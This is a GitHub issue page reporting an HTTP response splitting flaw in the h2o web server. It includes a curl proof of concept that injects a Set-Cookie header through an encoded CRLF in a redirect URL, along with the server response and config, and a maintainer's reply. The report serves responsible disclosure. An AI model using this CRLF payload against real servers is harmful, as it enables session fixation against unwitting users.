Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hi,
I found out that i can do HTTP response splitting in h2o by feeding the URL with carriage return and new line (CRLF). Example:
$ curl -I "http://fooexample.com/en/%0d%0aset-cookie:test=test"
HTTP/1.1 301 Redirected Date: Thu, 07 Jan 2016 08:56:34 GMT Server: h2o/1.6.0 Connection: keep-alive location: https://fooexample.com/en/ set-cookie:test=test content-type: text/html; charset=utf-8
the h2o config:
hosts: "fooexample.com": listen: port: 80 paths: "/": redirect: status: 301 url: https://fooexample.com/ "fooexample.com": listen: port: 443 ssl: certificate-file: /path/to/fooexample.crt key-file: /path/to/fooexample.key
This issue could lead to session fixation attack where an attacker could coerce a victim into clicking a link with an injected predefined cookie
The text was updated successfully, but these errors were encountered:
Thank you for reporting the issue. Looking into it.
Sorry, something went wrong.
thanks @kazuho
No branches or pull requests
Hi,
I found out that i can do HTTP response splitting in h2o by feeding the URL with carriage return
and new line (CRLF). Example:
the h2o config:
This issue could lead to session fixation attack where an attacker could coerce a victim
into clicking a link with an injected predefined cookie
The text was updated successfully, but these errors were encountered: